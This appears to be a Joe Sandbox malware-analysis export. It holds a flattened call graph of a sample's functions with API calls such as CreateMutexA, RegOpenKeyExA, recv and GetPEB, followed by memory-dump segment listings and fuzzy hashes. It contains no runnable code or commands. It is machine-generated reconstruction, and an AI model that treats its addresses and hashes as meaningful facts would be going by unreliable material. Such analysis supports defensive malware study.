665c10 6 API calls 12740->12741 12742 66aa8d 12741->12742 12743 665c10 6 API calls 12742->12743 12743->12744 12748 669284 12745->12748 12746 665c10 6 API calls 12746->12748 12747 669543 12747->12738 12748->12746 12749 66944f 12748->12749 12749->12747 12750 66979f 12749->12750 12751 665c10 6 API calls 12749->12751 12752 6698b5 12750->12752 12753 665c10 6 API calls 12750->12753 12751->12749 12752->12738 12754 669927 12753->12754 12754->12738 12398 6687b2 12399 6687b6 12398->12399 12400 6687b8 GetFileAttributesA 12398->12400 12399->12400 12401 6687c4 12400->12401 12655 662170 12658 67c6fc 12655->12658 12657 66217a 12659 67c724 12658->12659 12660 67c70c 12658->12660 12659->12657 12660->12659 12662 67cfbe 12660->12662 12663 67ccd5 InitializeCriticalSectionEx 12662->12663 12664 67cfd0 12663->12664 12664->12660 12665 66ad70 12666 66aec0 12665->12666 12668 66addc 12665->12668 12668->12666 12669 698ab6 12668->12669 12670 698ad1 12669->12670 12671 698868 4 API calls 12670->12671 12672 698adb 12671->12672 12672->12668 12724 668d30 12725 668d7f 12724->12725 12726 665c10 6 API calls 12725->12726 12727 668d9a 12726->12727 12797 6642b0 12800 663ac0 12797->12800 12799 6642bb 12801 663af9 12800->12801 12802 6632d0 6 API calls 12801->12802 12804 663c38 12801->12804 12806 663b39 12801->12806 12802->12804 12803 6632d0 6 API calls 12807 663c5f 12803->12807 12804->12803 12804->12807 12805 663c68 12805->12799 12806->12799 12807->12805 12808 663810 4 API calls 12807->12808 12809 663cdb 12808->12809 13101 6677b0 13102 6677f1 13101->13102 13103 665c10 6 API calls 13102->13103 13105 667883 13102->13105 13103->13105 13104 665c10 6 API calls 13107 6679e3 13104->13107 13105->13104 13106 667953 13105->13106 13108 665c10 6 API calls 13107->13108 13109 667a15 13108->13109 13110 665c10 6 API calls 13109->13110 13115 667aa5 13109->13115 13111 667b7d 13110->13111 13112 665c10 6 API calls 13111->13112 13113 667ba0 13112->13113 13114 665c10 6 API calls 13113->13114 13114->13115 13116 6687b0 13117 6687b6 13116->13117 13118 6687b8 GetFileAttributesA 13116->13118 13117->13118 13119 6687c4 13118->13119 13120 6747b0 13122 674eed 13120->13122 13121 674f59 13122->13121 13123 667d30 7 API calls 13122->13123 13124 6750ed 13123->13124 13159 668380 13124->13159 13126 675106 13127 665c10 6 API calls 13126->13127 13128 675155 13127->13128 13129 665c10 6 API calls 13128->13129 13130 675171 13129->13130 13165 669a00 13130->13165 13160 6683e5 13159->13160 13161 665c10 6 API calls 13160->13161 13162 668403 13160->13162 13163 668427 13161->13163 13162->13126 13164 665c10 6 API calls 13163->13164 13164->13162 13166 669a3f 13165->13166 13167 665c10 6 API calls 13166->13167 13168 669a47 13167->13168 13169 668b30 6 API calls 13168->13169 13170 669a58 13169->13170 12814 669ab8 12816 669acc 12814->12816 12817 669b08 12816->12817 12818 665c10 6 API calls 12817->12818 12819 669b7c 12818->12819 12820 668b30 6 API calls 12819->12820 12821 669b8d 12820->12821 12822 665c10 6 API calls 12821->12822 12823 669cb1 12822->12823 12824 668b30 6 API calls 12823->12824 12825 669cc2 12824->12825 12564 67d0c7 12566 67d0d7 12564->12566 12565 67d17f 12566->12565 12567 67d17b RtlWakeAllConditionVariable 12566->12567 12466 663c47 12467 663c51 12466->12467 12469 663c5f 12467->12469 12473 6632d0 12467->12473 12468 663c68 12469->12468 12492 663810 12469->12492 12496 67c6ac 12473->12496 12475 66336b 12502 67c26a 12475->12502 12478 66333c 12479 67c26a 5 API calls 12478->12479 12481 663350 12478->12481 12482 663377 12479->12482 12480 663314 12480->12475 12480->12478 12499 67bd4c 12480->12499 12481->12469 12483 67c6ac GetSystemTimePreciseAsFileTime 12482->12483 12484 6633af 12483->12484 12485 67c26a 5 API calls 12484->12485 12486 6633b6 12484->12486 12485->12486 12487 67c26a 5 API calls 12486->12487 12488 6633d7 12486->12488 12487->12488 12489 67c26a 5 API calls 12488->12489 12490 6633eb 12488->12490 12491 66340e 12489->12491 12490->12469 12491->12469 12493 66381c 12492->12493 12547 662440 12493->12547 12506 67c452 12496->12506 12498 67c6b9 12498->12480 12523 67bb72 12499->12523 12501 67bd5c 12501->12480 12503 67c292 12502->12503 12504 67c274 12502->12504 12503->12503 12504->12503 12529 67c297 12504->12529 12507 67c4a8 12506->12507 12509 67c47a 12506->12509 12507->12509 12512 67cf6b 12507->12512 12509->12498 12510 67c4fd 12510->12509 12511 67cf6b GetSystemTimePreciseAsFileTime 12510->12511 12511->12510 12513 67cf7a 12512->12513 12515 67cf87 12512->12515 12513->12515 12516 67cf44 12513->12516 12515->12510 12519 67cbea 12516->12519 12520 67cc07 12519->12520 12521 67cbfb GetSystemTimePreciseAsFileTime 12519->12521 12520->12515 12521->12520 12524 67bb9c 12523->12524 12525 67cf6b GetSystemTimePreciseAsFileTime 12524->12525 12528 67bba4 12524->12528 12526 67bbcf 12525->12526 12527 67cf6b GetSystemTimePreciseAsFileTime 12526->12527 12526->12528 12527->12528 12528->12501 12532 662ae0 12529->12532 12531 67c2ae 12540 67bedf 12532->12540 12534 662aff 12534->12531 12535 662af4 12535->12534 12536 69a671 4 API calls 12535->12536 12539 696ccc 12536->12539 12537 698bec 4 API calls 12538 696cf6 12537->12538 12539->12537 12543 67cc31 12540->12543 12544 67cc3f InitOnceExecuteOnce 12543->12544 12546 67bef2 12543->12546 12544->12546 12546->12535 12550 67b5d6 12547->12550 12549 662472 12551 67b5f1 12550->12551 12552 698bec 4 API calls 12551->12552 12554 67b658 12551->12554 12553 67b69f 12552->12553 12554->12549 12831 669f44 12832 669f4c 12831->12832 12833 66a953 Sleep CreateMutexA 12832->12833 12835 66a01f 12832->12835 12834 66a98e 12833->12834 12406 668780 12407 668786 12406->12407 12413 696729 12407->12413 12410 6687a6 12412 6687a0 12420 696672 12413->12420 12415 668793 12415->12410 12416 6967b7 12415->12416 12417 6967c3 12416->12417 12419 6967cd 12417->12419 12432 696740 12417->12432 12419->12412 12421 69667e 12420->12421 12423 696685 12421->12423 12424 69a8c3 12421->12424 12423->12415 12425 69a8cf 12424->12425 12428 69a967 12425->12428 12427 69a8ea 12427->12423 12430 69a98a 12428->12430 12429 69d82f RtlAllocateHeap 12431 69a9d0 12429->12431 12430->12429 12430->12430 12430->12431 12431->12427 12433 696762 12432->12433 12435 69674d 12432->12435 12433->12435 12436 69a038 12433->12436 12435->12419 12437 69a050 12436->12437 12439 69a075 12436->12439 12437->12439 12440 6a0439 12437->12440 12439->12435 12442 6a0445 12440->12442 12441 6a044d 12441->12439 12442->12441 12444 6a052b 12442->12444 12445 6a054d 12444->12445 12449 6a0551 12444->12449 12445->12449 12450 6a00d2 12445->12450 12449->12441 12452 6a00e3 12450->12452 12451 6a0106 12451->12449 12454 69fcc0 12451->12454 12452->12451 12453 69a671 4 API calls 12452->12453 12453->12451 12455 69fd0d 12454->12455 12456 69690a 4 API calls 12455->12456 12460 69fd1c 12456->12460 12457 69b67d 4 API calls 12457->12460 12458 69c719 GetPEB ExitProcess GetPEB RtlAllocateHeap 12458->12460 12459 69ffbc 12459->12449 12460->12457 12460->12458 12460->12459 12460->12460 12568 6620c0 12571 67c68b 12568->12571 12570 6620cc 12574 67c3d5 12571->12574 12573 67c69b 12573->12570 12575 67c3e1 12574->12575 12576 67c3eb 12574->12576 12577 67c3be 12575->12577 12578 67c39e 12575->12578 12576->12573 12587 67cd0a 12577->12587 12578->12576 12583 67ccd5 12578->12583 12581 67c3d0 12581->12573 12584 67cce3 InitializeCriticalSectionEx 12583->12584 12585 67c3b7 12583->12585 12584->12585 12585->12573 12588 67cd1f RtlInitializeConditionVariable 12587->12588 12588->12581 12589 66e0c0 recv 12590 66e122 recv 12589->12590 12591 66e157 recv 12590->12591 12593 66e191 12591->12593 12592 66e2b3 12593->12592 12594 67c6ac GetSystemTimePreciseAsFileTime 12593->12594 12595 66e2ee 12594->12595 12596 67c26a 5 API calls 12595->12596 12597 66e358 12596->12597 12760 668980 12762 6689d8 12760->12762 12763 668aea 12760->12763 12761 665c10 6 API calls 12761->12762 12762->12761 12762->12763 12775 662e00 12776 662e28 12775->12776 12777 67c68b 2 API calls 12776->12777 12778 662e33 12777->12778 12601 663c8e 12602 663c98 12601->12602 12604 663ca5 12602->12604 12609 662410 12602->12609 12605 663810 4 API calls 12604->12605 12606 663ccf 12604->12606 12605->12606 12607 663810 4 API calls 12606->12607 12608 663cdb 12607->12608 12610 662424 12609->12610 12613 67b52d 12610->12613 12621 693aed 12613->12621 12616 67b598 12624 67af56 12616->12624 12617 67b5a5 12628 67b1ad 12617->12628 12620 66242a 12620->12604 12632 694f29 12621->12632 12623 67b555 12623->12616 12623->12617 12623->12620 12625 67af9f 12624->12625 12627 67afb2 12625->12627 12638 67b39f 12625->12638 12627->12620 12629 67b1d8 12628->12629 12631 67b1e1 12628->12631 12630 67b39f 5 API calls 12629->12630 12630->12631 12631->12620 12633 694f2e 12632->12633 12633->12623 12634 69d634 4 API calls 12633->12634 12636 698bfc 12633->12636 12634->12636 12635 6965ed 3 API calls 12637 698c2f 12635->12637 12636->12635 12639 67bedf InitOnceExecuteOnce 12638->12639 12640 67b3e1 12639->12640 12641 67b3e8 12640->12641 12649 696cbb 12640->12649 12641->12627 12650 696cc7 12649->12650 12651 69a671 4 API calls 12650->12651 12654 696ccc 12651->12654 12652 698bec 4 API calls 12653 696cf6 12652->12653 12654->12652 12767 696a44 12768 696a5c 12767->12768 12769 696a52 12767->12769 12772 69698d 12768->12772 12771 696a76 12773 69690a 4 API calls 12772->12773 12774 69699f 12773->12774 12774->12771 12195 66a856 12196 66a870 12195->12196 12197 66a892 12195->12197 12196->12197 12200 66a94e 12196->12200 12210 66a8a0 12197->12210 12211 667d30 12197->12211 12199 66a953 Sleep CreateMutexA 12203 66a98e 12199->12203 12200->12199 12201 66a8ae 12202 667d30 7 API calls 12201->12202 12201->12210 12204 66a8b8 12202->12204 12205 667d30 7 API calls 12204->12205 12204->12210 12206 66a8c2 12205->12206 12207 667d30 7 API calls 12206->12207 12206->12210 12208 66a8cc 12207->12208 12209 667d30 7 API calls 12208->12209 12208->12210 12209->12210 12212 667d96 12211->12212 12249 667ee8 12212->12249 12250 665c10 12212->12250 12214 667dd2 12215 665c10 6 API calls 12214->12215 12217 667dff 12215->12217 12216 667ed3 GetNativeSystemInfo 12218 667ed7 12216->12218 12217->12216 12217->12218 12217->12249 12219 667f3f 12218->12219 12220 668019 12218->12220 12218->12249 12221 665c10 6 API calls 12219->12221 12222 665c10 6 API calls 12220->12222 12223 667f67 12221->12223 12224 66804c 12222->12224 12225 665c10 6 API calls 12223->12225 12226 665c10 6 API calls 12224->12226 12228 667f86 12225->12228 12227 66806b 12226->12227 12230 665c10 6 API calls 12227->12230 12260 698bbe 12228->12260 12231 6680a3 12230->12231 12232 665c10 6 API calls 12231->12232 12233 6680f4 12232->12233 12234 665c10 6 API calls 12233->12234 12235 668113 12234->12235 12236 665c10 6 API calls 12235->12236 12237 66814b 12236->12237 12238 665c10 6 API calls 12237->12238 12239 66819c 12238->12239 12240 665c10 6 API calls 12239->12240 12241 6681bb 12240->12241 12242 665c10 6 API calls 12241->12242 12243 6681f3 12242->12243 12244 665c10 6 API calls 12243->12244 12245 668244 12244->12245 12246 665c10 6 API calls 12245->12246 12247 668263 12246->12247 12248 665c10 6 API calls 12247->12248 12248->12249 12249->12201 12251 665c54 12250->12251 12263 664b30 12251->12263 12253 665c7b 12254 665d17 12253->12254 12255 665da7 RegOpenKeyExA 12253->12255 12254->12214 12256 665e00 RegCloseKey 12255->12256 12258 665e26 12256->12258 12257 665ea6 12257->12214 12258->12257 12259 665c10 4 API calls 12258->12259 12389 698868 12260->12389 12262 698bdc 12262->12249 12265 664ce5 12263->12265 12266 664b92 12263->12266 12265->12253 12266->12265 12267 696da6 12266->12267 12268 696db4 12267->12268 12271 696dc2 12267->12271 12272 696d19 12268->12272 12271->12266 12277 69690a 12272->12277 12276 696d3d 12276->12266 12278 69692a 12277->12278 12279 696921 12277->12279 12278->12279 12291 69a671 12278->12291 12285 696d52 12279->12285 12286 696d8f 12285->12286 12287 696d5f 12285->12287 12381 69b67d 12286->12381 12290 696d6e 12287->12290 12376 69b6a1 12287->12376 12290->12276 12292 69a67b 12291->12292 12296 69a694 12292->12296 12306 69d82f 12292->12306 12294 69694a 12298 69b5fb 12294->12298 12296->12294 12310 698bec 12296->12310 12299 69b60e 12298->12299 12300 696960 12298->12300 12299->12300 12341 69f5ab 12299->12341 12302 69b628 12300->12302 12303 69b63b 12302->12303 12304 69b650 12302->12304 12303->12304 12348 69e6b1 12303->12348 12304->12279 12307 69d83c 12306->12307 12308 69d87a 12307->12308 12309 69d867 RtlAllocateHeap 12307->12309 12308->12296 12309->12307 12309->12308 12311 698bf1 12310->12311 12314 698bfc 12311->12314 12316 69d634 12311->12316 12330 6965ed 12314->12330 12317 69d640 12316->12317 12318 69d81b 12317->12318 12319 69d726 12317->12319 12321 69d751 12317->12321 12329 69d69c 12317->12329 12320 6965ed 3 API calls 12318->12320 12319->12321 12333 69d62b 12319->12333 12323 69d82e 12320->12323 12325 69a671 4 API calls 12321->12325 12327 69d7a5 12321->12327 12321->12329 12325->12327 12326 69d62b 4 API calls 12326->12321 12328 69a671 4 API calls 12327->12328 12327->12329 12328->12329 12329->12314 12336 6964c7 12330->12336 12334 69a671 GetPEB ExitProcess GetPEB RtlAllocateHeap 12333->12334 12335 69d630 12334->12335 12335->12326 12338 6964d5 12336->12338 12337 696520 12338->12337 12339 69652b GetPEB ExitProcess GetPEB 12338->12339 12340 69652a 12339->12340 12342 69f5b7 12341->12342 12343 69a671 4 API calls 12342->12343 12345 69f5c0 12343->12345 12344 69f606 12344->12300 12345->12344 12346 698bec 4 API calls 12345->12346 12347 69f62b 12346->12347 12349 69a671 4 API calls 12348->12349 12350 69e6bb 12349->12350 12353 69e5c9 12350->12353 12352 69e6c1 12352->12304 12357 69e5d5 12353->12357 12354 69e5f6 12354->12352 12355 698bec 4 API calls 12356 69e668 12355->12356 12358 69e6a4 12356->12358 12362 69a72e 12356->12362 12357->12354 12357->12355 12358->12352 12363 69a739 12362->12363 12365 69d82f RtlAllocateHeap 12363->12365 12368 69a745 12363->12368 12364 698bec GetPEB ExitProcess GetPEB RtlAllocateHeap 12366 69a7c7 12364->12366 12365->12368 12367 69a7be 12369 69e4b0 12367->12369 12368->12364 12368->12367 12370 69e5c9 GetPEB ExitProcess GetPEB RtlAllocateHeap 12369->12370 12371 69e4c3 12370->12371 12372 69e259 GetPEB ExitProcess GetPEB RtlAllocateHeap 12371->12372 12373 69e4cb 12372->12373 12374 69e4dc 12373->12374 12375 69e6c4 GetPEB ExitProcess GetPEB RtlAllocateHeap 12373->12375 12374->12358 12375->12374 12377 69690a 4 API calls 12376->12377 12378 69b6be 12377->12378 12380 69b6ce 12378->12380 12386 69f1bf 12378->12386 12380->12290 12382 69a671 4 API calls 12381->12382 12383 69b688 12382->12383 12384 69b5fb 4 API calls 12383->12384 12385 69b698 12384->12385 12385->12290 12387 69690a 4 API calls 12386->12387 12388 69f1df 12387->12388 12388->12380 12390 69887a 12389->12390 12391 69690a 4 API calls 12390->12391 12394 69888f 12390->12394 12393 6988bf 12391->12393 12392 696d52 4 API calls 12392->12393 12393->12392 12393->12394 12394->12262 12728 67d111 12730 67d122 12728->12730 12729 67d12a 12730->12729 12732 67d199 12730->12732 12733 67d1a7 SleepConditionVariableCS 12732->12733 12735 67d1c0 12732->12735 12733->12735 12735->12730 12972 662b10 12973 662b1c 12972->12973 12974 662b1a 12972->12974 12975 67c26a 5 API calls 12973->12975 12976 662b22 12975->12976 13171 662b90 13172 662bce 13171->13172 13173 67b7fb TpReleaseWork 13172->13173 13174 662bdb 13173->13174 13012 6787d0 13013 67882a 13012->13013 13019 679bb0 13013->13019 13017 6788d9 13018 67886c 13032 679ef0 13019->13032 13021 679be5 13022 662ce0 5 API calls 13021->13022 13023 679c16 13022->13023 13036 679f70 13023->13036 13025 678854 13025->13018 13026 6643f0 13025->13026 13027 67bedf InitOnceExecuteOnce 13026->13027 13029 66440a 13027->13029 13028 664411 13028->13017 13029->13028 13030 696cbb 4 API calls 13029->13030 13031 664424 13030->13031 13033 679f0c 13032->13033 13034 67c68b 2 API calls 13033->13034 13035 679f17 13034->13035 13035->13021 13038 679fef 13036->13038 13040 67a058 13038->13040 13041 67a210 13038->13041 13039 67a03b 13039->13025 13042 67a290 13041->13042 13048 6771d0 13042->13048 13044 67a4be 13044->13039 13045 67a2cc 13045->13044 13046 663ee0 3 API calls 13045->13046 13047 67a4a6 13046->13047 13047->13039 13049 677211 13048->13049 13056 663970 13049->13056 13051 677446 13051->13045 13052 6772ad 13052->13051 13053 67c68b 2 API calls 13052->13053 13054 677401 13053->13054 13061 662ec0 13054->13061 13057 67c68b 2 API calls 13056->13057 13058 6639a7 13057->13058 13059 67c68b 2 API calls 13058->13059 13060 6639e6 13059->13060 13060->13052 13062 662f06 13061->13062 13066 662f6f 13061->13066 13063 67c6ac GetSystemTimePreciseAsFileTime 13062->13063 13064 662f12 13063->13064 13065 66301e 13064->13065 13070 662f1d 13064->13070 13067 67c26a 5 API calls 13065->13067 13071 67c6ac GetSystemTimePreciseAsFileTime 13066->13071 13080 662fef 13066->13080 13068 663024 13067->13068 13069 67c26a 5 API calls 13068->13069 13072 662fb9 13069->13072 13070->13066 13070->13068 13071->13072 13073 67c26a 5 API calls 13072->13073 13074 662fc0 13072->13074 13073->13074 13075 67c26a 5 API calls 13074->13075 13077 662fd8 13074->13077 13075->13077 13076 67c26a 5 API calls 13078 66303c 13076->13078 13077->13076 13077->13080 13079 67c6ac GetSystemTimePreciseAsFileTime 13078->13079 13090 663080 13079->13090 13080->13051 13081 6631c5 13082 67c26a 5 API calls 13081->13082 13083 6631cb 13082->13083 13084 67c26a 5 API calls 13083->13084 13085 6631d1 13084->13085 13086 67c26a 5 API calls 13085->13086 13092 663193 13086->13092 13087 6631a7 13087->13051 13088 67c26a 5 API calls 13089 6631dd 13088->13089 13090->13081 13090->13083 13090->13087 13091 67c6ac GetSystemTimePreciseAsFileTime 13090->13091 13093 66315f 13091->13093 13092->13087 13092->13088 13093->13081 13093->13085 13093->13092 13094 67bd4c GetSystemTimePreciseAsFileTime 13093->13094 13094->13093 13175 663f9f 13176 663fad 13175->13176 13178 663fb6 13175->13178 13177 662410 5 API calls 13176->13177 13177->13178 12779 669adc 12780 669aea 12779->12780 12784 669afe 12779->12784 12781 66a917 12780->12781 12780->12784 12782 66a953 Sleep CreateMutexA 12781->12782 12783 66a98e 12782->12783 12785 665c10 6 API calls 12784->12785 12786 669b7c 12785->12786 12793 668b30 12786->12793 12788 669b8d 12789 665c10 6 API calls 12788->12789 12790 669cb1 12789->12790 12791 668b30 6 API calls 12790->12791 12792 669cc2 12791->12792 12794 668b7c 12793->12794 12795 665c10 6 API calls 12794->12795 12796 668b97 12795->12796 12796->12788 12678 66215a 12679 67c6fc InitializeCriticalSectionEx 12678->12679 12680 662164 12679->12680
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • ExitProcess.KERNEL32(?,?,0069652A,?,?,?,?,?,00697661), ref: 00696567
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881159750.0000000000660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881224962.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881428812.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881494212.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881563416.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881936611.0000000000836000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882002715.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882082303.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882148117.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882216423.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882216423.000000000085C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882294346.000000000085F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882325046.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882368787.0000000000862000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882399080.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882430149.0000000000864000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882464300.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882493312.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882522058.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882555423.000000000086F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882587428.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882633917.0000000000889000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882665288.000000000088B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882693750.000000000088C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882723575.000000000088D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882748482.000000000088E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882779239.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882809788.0000000000895000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882843328.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882883171.000000000089E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882928228.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882983295.00000000008B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883015972.00000000008BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883054349.00000000008C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883087341.00000000008C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883118586.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883166835.00000000008D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883196548.00000000008D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883226192.00000000008D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883275775.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883306152.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883336882.00000000008EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883368208.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883405036.00000000008FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883434356.00000000008FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883434356.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883548086.000000000094E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883576832.000000000094F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883608621.0000000000967000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883635943.0000000000968000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883662196.0000000000969000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883693841.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883742504.000000000096F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883778624.000000000097D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883809678.000000000097E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_660000_file.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExitProcess
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 621844428-0
                                                                                                                                                                                                        • Opcode ID: dd3bb6fc95a4814ffcdfdd6180e31617e8f132373eb42a0f1cdab17fb2439215
                                                                                                                                                                                                        • Instruction ID: a83658ebdf8169c294670d07bcf29f3ff00635ac4635a84324fd1a612b19f32d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd3bb6fc95a4814ffcdfdd6180e31617e8f132373eb42a0f1cdab17fb2439215
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4BE08C30001208AEDE257B18C919D893B6FFB91B45F124828F81886B32CB25EE81CA80
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.268885919992.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 62ae8e312a00e81a47e0f163c16685c2b8243a9d4ed58ef3687c76a13cf26903
                                                                                                                                                                                                        • Instruction ID: 06f68c1d55b4664be6b3eb09988872d2cdfc14c5daa3fd3c8dba3e4dcda2357a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 62ae8e312a00e81a47e0f163c16685c2b8243a9d4ed58ef3687c76a13cf26903
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5801DEFB24C210FEB08296C56B10AFA6B7EE5C6730330842BF857C5501F2A97A597472

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881159750.0000000000660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881224962.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881428812.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881494212.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881563416.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881936611.0000000000836000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882002715.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882082303.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
